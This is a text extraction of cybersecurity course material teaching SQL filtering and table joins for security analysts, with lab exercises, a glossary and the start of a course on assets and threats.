databases: string, numeric, and date and time. String data is data consisting of an ordered sequence
of characters. These characters could be numbers, letters, or symbols. For example, you'll encounter
string data in user names, such as a user name: analyst10. Numeric data is data consisting of
numbers, such as a count of log-in attempts. Unlike strings, mathematical operations can be used on
numeric data, like multiplication or addition. Date and time data refers to data representing a date
and/or time. Previously, we applied filters using string data, but now let's work with numeric and
date and time data. As a security analyst, you'll often need to query numbers and dates. For
example, we could filter patch dates to find machines that need an update, or we could filter log-in
attempts to return only those made in a certain period. We learned about operators in the last
video, and we're going to use them again for numbers and dates. Common operators for working
with numeric or date and time data types include: equals, greater than, less than, not equal to,
greater than or equal to, and less than or equal to. Let's say you want to find the log-in attempts
made after 6 pm. Because this is past normal business hours, you want to look for suspicious
patterns. You can identify these attempts by using the greater than operator in your filter. We'll
start writing our query in SQL. We begin by indicating that we want to select all columns FROM the
log_in_attempts table. Then we'll add our filter with WHERE. Our condition indicates that the value
in the time column must be greater than, or for dates and times, later than '18:00', which is how 6
pm is written in SQL. Let's run this and examine the output. Perfect! Now we have a list of log-in
attempts made after 6 pm. We can also filter for numbers and dates by using the BETWEEN
operator. BETWEEN is an operator that filters for numbers or dates within a range. An example of
this would be when looking for all patches installed within a certain range. Let's do this! Let's find
all
the patches installed between March 1st, 2021 and September 1st, 2021. In our query, we start with
selecting all records FROM the machines table. And we add the BETWEEN operator
in the WHERE statement. Let's break down the statement. First, after WHERE, we indicate
which column to filter, in our case, OS_patch_date. Next, comes our operator BETWEEN. We then
add the beginning of our range, type AND, then finish by adding the end of our range and a
semicolon. Now, let's run this and explore the output. And now we have a list of all machines
patched between those two dates! Before we wrap up, an important thing to note is that when we
filter for strings, dates, and times, we use quotation marks to specify what we're looking for.
However, for numbers, we don't use quotation marks. With this new knowledge, you're now ready
to work on all sorts of interesting filters for numbers and dates.
Operators for filtering dates and numbers
Previously, you examined operators like less than (<) or greater than (>) and explored how they can be
used in filtering numeric and date and time data types. This reading summarizes what you learned and
provides new examples of using operators in filters.
Numbers, dates, and times in cybersecurity
Security analysts work with more than just string data, or data consisting of an ordered sequence of
characters.
They also frequently work with numeric data, or data consisting of numbers. A few examples of numeric
data that you might encounter in your work as a security analyst include:
●
●
●
the number of login attempts
the count of a specific type of log entry
the volume of data being sent from a source
●
the volume of data being sent to a destination
You'll also encounter date and time data, or data representing a date and/or time. As a first example, logs
will generally timestamp every record. Other time and date data might include:
●
●
●
●
login dates
login times
dates for patches
the duration of a connection
Comparison operators
In SQL, filtering numeric and date and time data often involves operators. You can use the following
operators in your filters to make sure you return only the rows you need:
operator
<
>
=
<=
>=
<>
use
less than
greater than
equal to
less than or equal to
greater than or equal to
not equal to
Note: You can also use != as an alternative operator for not equal to.
Incorporating operators into filters
These comparison operators are used in the WHERE clause at the end of a query. The following query
uses the > operator to filter the birthdate column. You can run this query to explore its output:
1
2
3
This query returns the first and last names of employees born after, but not on, '1970-01-01' (or January
1, 1970). If you were to use the >= operator instead, the results would also include results on exactly
'1970-01-01'.
In other words, the > operator is exclusive and the >= operator is inclusive. An exclusive operator is an
operator that does not include the value of comparison. An inclusive operator is an operator that
includes the value of comparison.
BETWEEN
Another operator used for numeric data as well as date and time data is the BETWEEN operator.
BETWEEN filters for numbers or dates within a range. For example, if you want to find the first and last
names of all employees hired between January 1, 2002 and January 1, 2003, you can use the BETWEEN
operator as follows:
1
2
3
Note: The BETWEEN operator is inclusive. This means records with a hiredate of January 1, 2002 or
January 1, 2003 are included in the results of the previous query.
Key takeaways
Operators are important when filtering numeric and date and time data. These include exclusive
operators such as < and inclusive operators such as <=. The BETWEEN operator, another inclusive
operator, helps you return the data you need within a range.
Activity overview
As a security analyst, you’ll often need to query numbers and dates.
For example, you may need to filter patch dates to find machines that need an update. Or
you might filter login attempts made during a certain period to investigate a security
incident.
Common operators for working with numeric or date and time data will help you
accurately filter data. These are some of the operators you'll use:
●
●
●
●
●
●
= (equal)
> (greater than)
< (less than)
<> (not equal to)
>= (greater than or equal to)
<= (less than or equal to)
Filters with AND, OR, and NOT
In the previous lesson, we learned about even more ways to filter queries in SQL to work with some
typical security analyst tasks. However, when working with real security questions, we often have
to filter for multiple conditions. Vulnerabilities, for instance, might depend on more than one factor.
For example, a security vulnerability might be related to machines using a specific email client on a
specific operating system. So, to find the possible vulnerabilities, we need to find machines using
both the email client and the operating system. To make a query with multiple conditions that must
be met, we use the AND operator between
two separate conditions. AND is an operator that specifies that both conditions must
be met simultaneously. Bringing this back to our fruit and vegetable analogy, this is the same as
asking someone to select apples from the big box where the
apples are large and fresh. This means our results won't
include any small apples even if they're fresh, or any rotten apples even
if they're large. They'll only include large fresh apples. The apples must meet
both conditions. Going back to our database, the machines table lists all operating systems
and email clients. We want a list of machines running Operating System 1 and a list of machines
using Email Client 1. We'll use the left and right circles in the Venn diagram to represent these
groups. We need SQL to select the machines that have both OS 1 and Email Client 1. The filled-in
area at the intersection of these circles represents this condition. Let's take this and implement it in
SQL. First, we're going to start by building the first
lines of the query, telling SQL to SELECT* all columns FROM the
machines table. Then, we'll add the WHERE clause. Let's examine this more closely. First, we
indicate the first condition that it must meet, that the operating system
column has a value of '0S 1' Then, we use AND to join this to another condition. And finally, we
enter the other condition, in this case that the email client column should have a value of 'Email
Client 1' And this is how you use the AND operator in SQL! Let's run this to get the query results.
Perfect! All the results match both our conditions! Let's keep going and explore more ways to
combine different conditions by working with the OR operator. The OR operator is an operator that
specifies that either condition can be met. In a Venn diagram, let's say each circle represents a
condition. When they are joined with OR, SQL would select all rows that satisfy one of the
conditions. And it's also ok if it meets both conditions. Let's run another query and use the OR
operator. Let's say that we wanted the filter to identify
machines that have either OS 1 or OS 3 because both types need a patch. We'll type in these
conditions. Let's examine this more closely. After WHERE, our first condition indicates we want to
filter, so that the query selects machines with 'OS 1' We use the OR operator because we also want
to find records that match another condition. This additional condition is placed after OR and
indicates to also select machines running 'OS 3' Executing the query, our results now include
records that have a value of either OS 1 or OS 3 in the operating system column. Good job, we're
running
some complex queries. The last operator we're going to go into is the NOT operator. NOT negates a
condition. In a diagram, we can show this by selecting every entry that does
not match our condition. The condition is
represented by the circle. The filled-in portion outside the circle represents
what gets returned. This is all data that does
not match the condition. For example, when picking out fruit, you can be looking for any
fruit that is not an apple. That is a lot more efficient than telling your friend you want a banana or
an orange or a lime, and so on. Suppose you wanted to update all of the devices in your company
except for the ones using OS 3. Bringing this into SQL, we can write this query. We place NOT after
WHERE and before the condition of the filter. Executing these queries gives us the list of all the
machines that aren't running OS 3, and now we know which machines to update. That was a lot of
new content that we just looked into, but you're learning more
and more SQL that you can use on your journey to become an analyst! In the next video, we'll be
learning how to combine and join two tables together to expand the kinds of queries we can
run. I'll meet you there!
More on filters with AND, OR, and NOT
Previously, you explored how to add filters containing the AND, OR, and NOT operators to
your SQL queries. In this reading, you'll continue to explore how these operators can help
you refine your queries.
Logical operators
AND, OR, and NOT allow you to filter your queries to return the specific information that
will help you in your work as a security analyst. They are all considered logical operators.
AND
First, AND is used to filter on two conditions. AND specifies that both conditions must be
met simultaneously.
As an example, a cybersecurity concern might affect only those customer accounts that
meet both the condition of being handled by a support representative with an ID of 5 and
the condition of being located in the USA. To find the names and emails of those specific
customers, you should place the two conditions on either side of the AND operator in the
WHERE clause:
1
2
3
SELECT firstname, lastname, email, country, supportrepid
FROM customers
WHERE supportrepid = 5 AND country = 'USA';
RunReset
+-----------+----------+-------------------------+---------+--------------+
| FirstName | LastName | Email
| Country | SupportRepId |
+-----------+----------+-------------------------+---------+--------------+
| Jack | Smith | jacksmith@microsoft.com | USA |
5|
| Kathy | Chase | kachase@hotmail.com | USA |
5|
| Victor | Stevens | vstevens@yahoo.com | USA |
5|
| Julia | Barnett | jubarnett@gmail.com | USA |
5|
+-----------+----------+-------------------------+---------+--------------+
Running this query returns four rows of information about the customers. You can use this
information to contact them about the security concern.
OR
The OR operator also connects two conditions, but OR specifies that either condition can be
met. It returns results where the first condition, the second condition, or both are met.
For example, if you are responsible for finding all customers who are either in the USA or
Canada so that you can communicate information about a security update, you can use an
OR operator to find all the needed records. As the following query demonstrates, you
should place the two conditions on either side of the OR operator in the WHERE clause:
1
2
3
SELECT firstname, lastname, email, country
FROM customers
WHERE country = 'Canada' OR country = 'USA';
RunReset
+-----------+------------+--------------------------+---------+
| FirstName | LastName | Email
| Country |
+-----------+------------+--------------------------+---------+
| François | Tremblay | ftremblay@gmail.com | Canada |
| Mark | Philips | mphilips12@shaw.ca
| Canada |
| Jennifer | Peterson | jenniferp@rogers.ca | Canada |
| Frank | Harris | fharris@google.com
| USA |
| Jack | Smith | jacksmith@microsoft.com | USA |
| Michelle | Brooks | michelleb@aol.com
| USA |
| Tim
| Goyer | tgoyer@apple.com
| USA |
| Dan
| Miller | dmiller@comcast.com | USA |
| Kathy | Chase | kachase@hotmail.com | USA |
| Heather | Leacock | hleacock@gmail.com
| USA |
| John | Gordon | johngordon22@yahoo.com | USA |
| Frank | Ralston | fralston@gmail.com
| USA |
| Victor | Stevens | vstevens@yahoo.com
| USA |
| Richard | Cunningham | ricunningham@hotmail.com | USA
| Patrick | Gray
| patrick.gray@aol.com | USA |
| Julia | Barnett | jubarnett@gmail.com | USA |
| Robert | Brown | robbrown@shaw.ca
| Canada |
| Edward | Francis | edfrancis@yachoo.ca | Canada |
| Martha | Silk
| marthasilk@gmail.com | Canada |
| Aaron | Mitchell | aaronmitchell@yahoo.ca | Canada |
| Ellie | Sullivan | ellie.sullivan@shaw.ca | Canada |
+-----------+------------+--------------------------+---------+
|
The query returns all customers in either the US or Canada.
Note: Even if both conditions are based on the same column, you need to write out both full
conditions. For instance, the query in the previous example contains the filter WHERE
country = 'Canada' OR country = 'USA'.
NOT
Unlike the previous two operators, the NOT operator only works on a single condition, and
not on multiple ones. The NOT operator negates a condition. This means that SQL returns
all records that don’t match the condition specified in the query.
For example, if a cybersecurity issue doesn't affect customers in the USA but might affect
those in other countries, you can return all customers who are not in the USA. This would
be more efficient than creating individual conditions for all of the other countries. To use
the NOT operator for this task, write the following query and place NOT directly after
WHERE:
1
2
3
SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'USA';
RunReset
+-----------+-------------+-------------------------------+----------------+
| FirstName | LastName | Email
| Country
|
+-----------+-------------+-------------------------------+----------------+
| Luís | Gonçalves | luisg@embraer.com.br
| Brazil
|
| Leonie | Köhler | leonekohler@surfeu.de
| Germany
|
| François | Tremblay | ftremblay@gmail.com
| Canada
|
| Bjørn | Hansen | bjorn.hansen@yahoo.no
| Norway
|
| František | Wichterlová | frantisekw@jetbrains.com | Czech Republic |
| Helena | Holý
| hholy@gmail.com
| Czech Republic |
| Astrid | Gruber | astrid.gruber@apple.at
| Austria
|
| Daan | Peeters | daan_peeters@apple.be
| Belgium
|
| Kara | Nielsen | kara.nielsen@jubii.dk
| Denmark
|
| Eduardo | Martins | eduardo@woodstock.com.br | Brazil
|
| Alexandre | Rocha
| alero@uol.com.br
| Brazil
|
| Roberto | Almeida | roberto.almeida@riotur.gov.br | Brazil
|
| Fernanda | Ramos
| fernadaramos4@uol.com.br | Brazil
|
| Mark | Philips | mphilips12@shaw.ca
| Canada
|
| Jennifer | Peterson | jenniferp@rogers.ca
| Canada
|
| Robert | Brown
| robbrown@shaw.ca
| Canada
|
| Edward | Francis | edfrancis@yachoo.ca
| Canada
|
| Martha | Silk
| marthasilk@gmail.com
| Canada
|
| Aaron | Mitchell | aaronmitchell@yahoo.ca
| Canada
|
| Ellie | Sullivan | ellie.sullivan@shaw.ca
| Canada
|
| João | Fernandes | jfernandes@yahoo.pt
| Portugal
|
| Madalena | Sampaio | masampaio@sapo.pt
| Portugal
|
| Hannah | Schneider | hannah.schneider@yahoo.de | Germany
|
| Fynn | Zimmermann | fzimmermann@yahoo.de
| Germany
|
| Niklas | Schröder | nschroder@surfeu.de
| Germany
|
+-----------+-------------+-------------------------------+----------------+
(Output limit exceeded, 25 of 46 total rows shown)
SQL returns every entry where the customers are not from the USA.
Pro tip: Another way of finding values that are not equal to a certain value is by using the
<> operator or the != operator. For example, WHERE country <> 'USA' and WHERE country
!= 'USA' are the same filters as WHERE NOT country = 'USA'.
Combining logical operators
Logical operators can be combined in filters. For example, if you know that both the USA
and Canada are not affected by a cybersecurity issue, you can combine operators to return
customers in all countries besides these two. In the following query, NOT is placed before
the first condition, it's joined to a second condition with AND, and then NOT is also placed
before that second condition. You can run it to explore what it returns:
1
2
3
SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'Canada' AND NOT country = 'USA';
RunReset
+-----------+-------------+-------------------------------+----------------+
| FirstName | LastName | Email
| Country
|
+-----------+-------------+-------------------------------+----------------+
| Luís | Gonçalves | luisg@embraer.com.br
| Brazil
|
| Leonie | Köhler | leonekohler@surfeu.de
| Germany
|
| Bjørn | Hansen | bjorn.hansen@yahoo.no
| Norway
|
| František | Wichterlová | frantisekw@jetbrains.com | Czech Republic |
| Helena | Holý
| hholy@gmail.com
| Czech Republic |
| Astrid | Gruber | astrid.gruber@apple.at
| Austria
|
| Daan | Peeters | daan_peeters@apple.be
| Belgium
|
| Kara | Nielsen | kara.nielsen@jubii.dk
| Denmark
|
| Eduardo | Martins | eduardo@woodstock.com.br | Brazil
|
| Alexandre | Rocha
| alero@uol.com.br
| Brazil
|
| Roberto | Almeida | roberto.almeida@riotur.gov.br | Brazil
|
| Fernanda | Ramos
| fernadaramos4@uol.com.br | Brazil
|
| João | Fernandes | jfernandes@yahoo.pt
| Portugal
|
| Madalena | Sampaio | masampaio@sapo.pt
| Portugal
|
| Hannah | Schneider | hannah.schneider@yahoo.de | Germany
|
| Fynn | Zimmermann | fzimmermann@yahoo.de
| Germany
|
| Niklas | Schröder | nschroder@surfeu.de
| Germany
|
| Camille | Bernard | camille.bernard@yahoo.fr | France
|
| Dominique | Lefebvre | dominiquelefebvre@gmail.com | France
|
| Marc | Dubois | marc.dubois@hotmail.com
| France
|
| Wyatt | Girard | wyatt.girard@yahoo.fr
| France
|
| Isabelle | Mercier | isabelle_mercier@apple.fr | France
|
| Terhi | Hämäläinen | terhi.hamalainen@apple.fi | Finland
|
| Ladislav | Kovács | ladislav_kovacs@apple.hu | Hungary
|
| Hugh | O'Reilly | hughoreilly@apple.ie
| Ireland
|
+-----------+-------------+-------------------------------+----------------+
(Output limit exceeded, 25 of 38 total rows shown)
Key takeaways
Logical operators allow you to create more specific filters that target the security-related
information you need. The AND operator requires two conditions to be true
simultaneously, the OR operator requires either one or both conditions to be true, and the
NOT operator negates a condition. Logical operators can be combined together to create
even more specific queries.
Join Tables in SQL
The last concept we're introducing in this section is joining tables
when querying a database. This is helpful when you need information from two different
tables in a database. Let's say we have two tables: one that tells us about security
vulnerabilities of different operating systems, and one about different machines
in our company, including their operating systems. Having the ability
to combine them gives us a list of vulnerable machines. That's pretty cool, right? First, let's
start talking about the syntax of joins. Since we're working with two tables now, we need a
way to tell SQL what table we're picking columns from. In our example database, we have
an employee_id column in both the employees table and the machines table. In SQL
statements that contain two columns, SQL needs to know which column we're referring to.
The way to resolve this is by writing the name of the table first, then a period, and then
the name of a column. So, we would have employees followed by a period, followed by the
column name. This is the employee_id column for the employees table. Similarly, this is the
employee_id column for the machines table. Now that we understand
this syntax, let's apply it to a join! Imagine that we want to get a deeper understanding of
the employees accessing the machines in our company. By joining the employees and the
machines tables, we can do this! We first need to identify the shared column that we'll use
to connect the two tables. In this case, we'll use a primary key and one table to connect to
another table where it's a foreign key. The primary key of the employees table is
employee_id, which is a foreign key in the machines table. employee_id is a primary key in
the employees table because it has a unique value for every row in the employees table,
and no empty values. We don't have a guarantee that the employee_id column in the
machines table follows the same criteria since it's a foreign key and not a primary key.
Next, we'll use a type of join called an INNER JOIN. An INNER JOIN returns rows matching on
a specified column that exists in more than one table. Tables usually contain many more
rows, but to further explain what we mean by INNER JOIN, let's focus on just four rows
from the employees table and four rows from the machines table. We'll also look at just a
few columns of each table for this example. Let's say we choose employee_id in both tables
to perform an INNER JOIN. Let's look at the two rows
where there is a match. Both tables have 1188 and 1189 in their respective employee_id
columns, so they are considered a match. The results of the join is the two rows that have
1188 and 1189 and all columns from both tables. Before we move on to the queries, we
must talk about the NULL values in the tables. In SQL, NULL represents a missing value due
to any reason. In this case, this might be machines that are not assigned to any employee.
Now, let's bring this into SQL and do an INNER JOIN on the full tables. Let's imagine we
want to join these tables to get a list of users and their office location that also shows what
operating system they use on their machines. employee_id is a common column between
these tables, and we can use this to join them. But we won't need to show this column in
the results. First, let's start with a basic query that indicates we want to select the
username, office, and operating system columns. We want employees to be our first or left
table, so we'll use that in our FROM statement. Now, we write the part of the query that
tells SQL to join the machines table with the employees table. Let's break down this query.
INNER JOIN tells SQL to perform the INNER JOIN. Then, we name the second table we want
to combine with the first. This is called the right table. In this case, we want to join
machines with the employees table that was already identified after FROM. Lastly, we tell
SQL what column to base the join on. In our case, we're using the employee_id column.
Since we're using two tables, we have to identify the table and follow that with the column
name. So, we have employees.employee_id. And machines.employee_id. Let's review the
output. Perfect! We have now joined two tables. The results of our query displays the
records that match on the employee_id column. Notice that these records contain columns
from both tables, but only the ones we've indicated through our SELECT statement.
In the previous video and exercises, we saw how inner joins can be useful by only returning
records that share a value in specify columns. However, in some situations, we might need
all of the entries from one or both of our tables. This is where we need to use outer joins.
There are three types of outer joins: LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN. Similar
to inner joins, outer joins combine two tables together; however, they don't necessarily
need a match between columns to return a row. Which rows are returned depends on the
type of join. LEFT JOIN returns all of the records of the first table, but only returns rows of
the second table that match on a specified column. Like we did in the previous video, let's
examine this type of join by looking at just four rows of two tables with a small number of
columns. Employees is the left
table, or the first table, and machines is the right table, or the second table. Let's join on
employee_id. There's a matching value in this column for two of the four records. When we
execute the join, SQL returns these rows with the matching value, all other rows from the
left table, and all columns from both tables. Records from the employees table that didn't
match but were returned through the LEFT JOIN contain NULL values in columns that came
from the machines table. Next, let's talk about right joins. RIGHT JOIN returns all of the
records of the second table but only returns rows from the first table that match
on a specified column. With a RIGHT JOIN on the previous example, the full result returns
matching rows from both, all the rows from the second table, and all the columns in both
tables. For the values that don't exist in either table, we are left with a NULL value. Last,
we'll discuss full outer joins. FULL OUTER JOIN returns all records from both tables. Using
our same example, a FULL OUTER JOIN returns all columns from all tables. If a row doesn't
have a value for a particular column, it returns NULL. For example, the machines table do
not have any rows with employee_id 1190, so the values for that row and the columns that
came from the machines table is NULL. To implement left joins, right joins, and full outer
joins in SQL, you use the same syntax structure as the INNER JOIN but use these keywords:
LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN. As a security analyst, you're not required to
know all of these from memory. Once you understand the type of join you need, you can
quickly search and find all the information you need to execute these queries. With this
information on joins, we've now covered some very important information you'll need as a
security
analyst using SQL.
Compare types of joins
Previously, you explored SQL joins and how to use them to join data from multiple tables when these
tables share a common column. You also examined how there are different types of joins, and each of
them returns different rows from the tables being joined. In this reading, you'll review these concepts
and more closely analyze the syntax needed for each type of join.
Inner joins
The first type of join that you might perform is an inner join. INNER JOIN returns rows matching on a
specified column that exists in more than one table.
It only returns the rows where there is a match, but like other types of joins, it returns all specified
columns from all joined tables. For example, if the query joins two tables with SELECT *, all columns in
both of the tables are returned.
Note: If a column exists in both of the tables, it is returned twice when SELECT * is used.
The syntax of an inner join
To write a query using INNER JOIN, you can use the following syntax:
SELECT *
FROM employees
INNER JOIN machines ON employees.device_id = machines.device_id;
You must specify the two tables to join by including the first or left table after FROM and the second or
right table after INNER JOIN.
After the name of the right table, use the ON keyword and the = operator to indicate the column you are
joining the tables on. It's important that you specify both the table and column names in this portion of
the join by placing a period (.) between the table and the column.
In addition to selecting all columns, you can select only certain columns. For example, if you only want
the join to return the username, operating_system and device_id columns, you can write this query:
SELECT username, operating_system, employees.device_id
FROM employees
INNER JOIN machines ON employees.device_id = machines.device_id;
Note: In the example query, username and operating_system only appear in one of the two tables, so they
are written with just the column name. On the other hand, because device_id appears in both tables, it's
necessary to indicate which one to return by specifying both the table and column name
(employees.device_id).
Outer joins
Outer joins expand what is returned from a join. Each type of outer join returns all rows from either one
table or both tables.
Left joins
When joining two tables, LEFT JOIN returns all the records of the first table, but only returns rows of the
second table that match on a specified column.
The syntax for using LEFT JOIN is demonstrated in the following query:
SELECT *
FROM employees
LEFT JOIN machines ON employees.device_id = machines.device_id;
As with all joins, you should specify the first or left table as the table that comes after FROM and the
second or right table as the table that comes after LEFT JOIN. In the example query, because employees is
the left table, all of its records are returned. Only records that match on the device_id column are
returned from the right table, machines.
Right joins
When joining two tables, RIGHT JOIN returns all of the records of the second table, but only returns rows
from the first table that match on a specified column.
The following query demonstrates the syntax for RIGHT JOIN:
SELECT *
FROM employees
RIGHT JOIN machines ON employees.device_id = machines.device_id;
RIGHT JOIN has the same syntax as LEFT JOIN, with the only difference being the keyword RIGHT JOIN
instructs SQL to produce different output. The query returns all records from machines, which is the
second or right table. Only matching records are returned from employees, which is the first or left table.
Note: You can use LEFT JOIN and RIGHT JOIN and return the exact same results if you use the tables in
reverse order. The following RIGHT JOIN query returns the exact same result as the LEFT JOIN query
demonstrated in the previous section:
SELECT *
FROM machines
RIGHT JOIN employees ON employees.device_id = machines.device_id;
All that you have to do is switch the order of the tables that appear before and after the keyword used
for the join, and you will have swapped the left and right tables.
Full outer joins
FULL OUTER JOIN returns all records from both tables. You can think of it as a way of completely merging
two tables.
You can review the syntax for using FULL OUTER JOIN in the following query:
SELECT *
FROM employees
FULL OUTER JOIN machines ON employees.device_id = machines.device_id;
The results of a FULL OUTER JOIN query include all records from both tables. Similar to INNER JOIN, the
order of tables does not change the results of the query.
Key takeaways
When working in SQL, there are multiple ways to join tables. All joins return the records that match on a
specified column. INNER JOIN will return only these records. Outer joins also return all other records
from one or both of the tables. LEFT JOIN returns all records from the first or left table, RIGHT JOIN
returns all records from the second or right table, and FULL OUTER JOIN returns all records from both
tables.
Activity overview
As a security analyst, you’ll often find that you need data from more than one table.
Previously, you learned that a relational database is a structured database containing tables
that are related to each other.
SQL joins enable you to combine tables that contain a shared column. This is helpful when
you need to connect information that appears in different tables.
In this lab activity, you’ll use SQL joins to connect separate tables and retrieve needed
information.
Get ready to apply what you’ve learned and join some data!
Note: The terms row and record are used interchangeably.
Scenario
In this scenario, you’ll investigate a recent security incident that compromised some
machines.
You are responsible for getting the required information from the database for the
investigation.
Here’s how you’ll do this task: First, you’ll use an inner join to identify which employees are
using which machines. Second, you’ll use left and right joins to find machines that do not
belong to any specific user and users who do not have any specific machine assigned to
them. Finally, you’ll use an inner join to list all login attempts made by all employees.
You’re ready to join tables in SQL!
Task 1. Match employees to their machines
First, you must identify which employees are using which machines. The data is located in
the machines and employees tables.
You must use a SQL inner join to return the records you need based on a connecting
column. In the scenario, both tables include the device_id column, which you’ll use to
perform the join.
1. Run the following query to retrieve all records from the machines table:
SELECT *
FROM machines;
Copied!
content_copy
You’ll note that this query is not sufficient to perform the join and retrieve the information
you need.
2. Complete the query to perform an inner join between the machines and employees tables
on the device_id column. Replace X and Y with this column name:
SELECT *
FROM machines
INNER JOIN employees ON machines.X = employees.Y;
Copied!
content_copy
Note: Placing the employees table after INNER JOIN makes it the right table.Note: If the output of
the query is too wide for your shell, press the Open Linux Console button described in the Lab
features section to open a full-screen view of the Bash shell, where you can re-enter the query.
How many rows did the inner join return?
Task 2. Return more data
You now must return the information on all machines and the employees who have
machines. Next, you must do the reverse and retrieve the information of all employees and
any machines that are assigned to them.
To achieve this, you’ll complete a left join and a right join on
the employees and machines tables. The results will include all records from one or the
other table. You must link these tables using the common device_id column.
1. Run the following SQL query to connect the machines and employees tables through a left
join. You must replace the keyword X in the query:
SELECT *
FROM machines
X JOIN employees ON machines.device_id = employees.device_id;
Copied!
content_copy
Note: In a left join, all records from the table referenced after FROM and before LEFT JOIN are
included in the result. In this case, all records from the machines table are included, regardless of
whether they are assigned to an employee or not.
What is the value in the username column for the last record returned?
cgriffin
NULL
areyes
asundara
Submit
2. Run the following SQL query to connect the machines and employees tables through a right
join. You must replace the keyword X in the query to solve the problem:
SELECT *
FROM machines
X JOIN employees ON machines.device_id = employees.device_id;
Copied!
content_copy
Note: In a right join, all records from the table referenced after RIGHT JOIN are included in the
result. In this case, all records from the employees table are included, regardless of whether they
have a machine or not.
Task 3. Retrieve login attempt data
To continue investigating the security incident, you must retrieve the information on all
employees who have made login attempts. To achieve this, you’ll perform an inner join on
the employees and log_in_attempts tables, linking them on the common username column.
Run the following SQL query to perform an inner join on
the employees and log_in_attempts tables. Replace X with the name of the right table. Then
replace Y and Z with the name of the column that connects the two tables:
SELECT *
FROM employees
INNER JOIN X ON Y = Z;
Copied!
content_copy
●
Note: You must specify the table name with the column name (table.column) when joining the
tables.
How many records are returned by this inner join?
Continuous learning in SQL
You've explored a lot about SQL, including applying filters to SQL queries and joining multiple tables
together in a query. There's still more that you can do with SQL. This reading will explore an example of
something new you can add to your SQL toolbox: aggregate functions. You'll then focus on how you can
continue learning about this and other SQL topics on your own.
Aggregate functions
In SQL, aggregate functions are functions that perform a calculation over multiple data points and return
the result of the calculation. The actual data is not returned.
There are various aggregate functions that perform different calculations:
●
●
COUNT returns a single number that represents the number of rows returned from your query.
AVG returns a single number that represents the average of the numerical data in a column.
●
SUM returns a single number that represents the sum of the numerical data in a column.
Aggregate function syntax
To use an aggregate function, place the keyword for it after the SELECT keyword, and then in
parentheses, indicate the column you want to perform the calculation on.
For example, when working with the customers table, you can use aggregate functions to summarize
important information about the table. If you want to find out how many customers there are in total,
you can use the COUNT function on any column, and SQL will return the total number of records,
excluding NULL values. You can run this query and explore its output:
1
2
SELECT COUNT(firstname)
FROM customers;
RunReset
The result is a table with one column titled COUNT(firstname) and one row that indicates the count.
If you want to find the number of customers from a specific country, you can add a filter to your query:
1
2
3
SELECT COUNT(firstname)
FROM customers
WHERE country = 'USA';
RunReset
With this filter, the count is lower because it only includes the records where the country column
contains a value of 'USA'.
There are a lot of other aggregate functions in SQL. The syntax of placing them after SELECT is exactly
the same as the COUNT function.
Continuing to learn SQL
SQL is a widely used querying language, with many more keywords and applications. You can continue
to learn more about aggregate functions and other aspects of using SQL on your own.
Most importantly, approach new tasks with curiosity and a willingness to find new ways to apply SQL to
your work as a security analyst. Identify the data results that you need and try to use SQL to obtain these
results.
Fortunately, SQL is one of the most important tools for working with databases and analyzing data, so
you'll find a lot of support in trying to learn SQL online. First, try searching for the concepts you've
already learned and practiced to find resources that have accurate easy-to-follow explanations. When
you identify these resources, you can use them to extend your knowledge.
Continuing your practical experience with SQL is also important. You can also search for new databases
that allow you to perform SQL queries using what you've learned.
Key takeaways
Aggregate functions like COUNT, SUM, and AVG allow you to work with SQL in new ways. There are many
other additional aspects of SQL that could be useful to you as an analyst. By continuing to explore SQL on
your own, you can expand the ways you can apply SQL in a cybersecurity context.
Reference guide: SQL
The SQL reference guide contains keywords for SQL queries. Security analysts can use these keywords
to query databases and find data to support security-related decisions. The reference guide is divided
into four different categories of SQL keywords for security-related tasks:
●
●
●
●
Query a database
Apply filters to SQL queries
Join tables
Perform calculations
Within each category, commands are organized alphabetically.
Access and save the guide
You can save a copy of this guide for future reference. You can use it as a resource for additional practice
or in your future professional projects.
To access a downloadable version of this course item, click the following link and select Use Template.
Reference guide: SQL
Glossary terms from module 4
Terms and definitions from Course 4, Module 4
Database: An organized collection of information or data
Date and time data: Data representing a date and/or time
Exclusive operator: An operator that does not include the value of comparison
Filtering: Selecting data that match a certain condition
Foreign key: A column in a table that is a primary key in another table
Inclusive operator: An operator that includes the value of comparison
Log: A record of events that occur within an organization's systems
Numeric data: Data consisting of numbers
Operator: A symbol or keyword that represents an operation
Primary key: A column where every row has a unique entry
Query: A request for data from a database table or a combination of tables
Relational database: A structured database containing tables that are related to each other
String data: Data consisting of an ordered sequence of characters
SQL (Structured Query Language): A programming language used to create, interact with, and request
information from a database
Syntax: The rules that determine what is correctly structured in a computing language
Wildcard: A special character that can be substituted with any other character
Course 5 – Assets, Threats, and Vulnerabilities
What do you picture when you think about the security field? This might make you think of a dark
room with people hunched over their computers. Maybe you picture a person in a lab
carefully analyzing evidence. Or, maybe you imagine a guard standing watch in front of a building.
The truth is, no matter what thoughts cross your mind, all of these examples are part of the wide
world of security. Hi, my name is Da'Queshia. I have worked as a security engineer for four years.
I'm excited to be your instructor for this course and share some of my experience with you. At
Google, I'm part of a diverse team of security professionals who all have different backgrounds and
unique perspectives. For example, in my role, I work to secure Gmail. Part of my daily activities
include developing new security features and fixing vulnerabilities in the application to make email
safer for our users. Some members of my team began working in
security after graduating from college. Many others found their way into the field
after years of working in another industry. Security teams come in all different shapes and sizes.
Each member of a team has a role to play. While our specific functions within the group differ, we
all share the same objective: protecting valuable assets from harm. Accomplishing this mission
involves a combination of people, processes, and tools. In this course, you'll learn about each of
these in detail. First, you'll be introduced to the world of asset security. You'll learn about the
variety of assets that organizations protect and how these factor into a company's overall approach
to security. Then, you'll begin exploring the security systems and controls that teams use to
proactively protect people and their information. All systems have weaknesses that can be
improved upon. When those weaknesses are neglected or ignored, they can lead to serious
problems. In this section of the course, you'll focus on common vulnerabilities in systems and the
ways security teams stay ahead of potential problems. Finally, you'll learn about the threats to asset
security. You'll also be introduced to the threat modeling process that security teams use to stay
one step ahead of potential attacks. In this field, we try to do everything possible to avoid being put
in a compromised position. By the end of this course, you'll have a clearer picture of the ways
people, processes, and technology work together
to protect all that's important. Throughout the course, you'll also get an idea of the exciting
career opportunities available to you. Security truly is an interdisciplinary field. Your background
and perspective is an asset. Whether you're a recent college graduate or starting a new career path,
the security field presents a wide range of possibilities.
Course 5 overview
Hello, and welcome to Assets, Threats, and Vulnerabilities, the fifth course in the Google Cybersecurity
Certificate. You’re on an exciting journey!
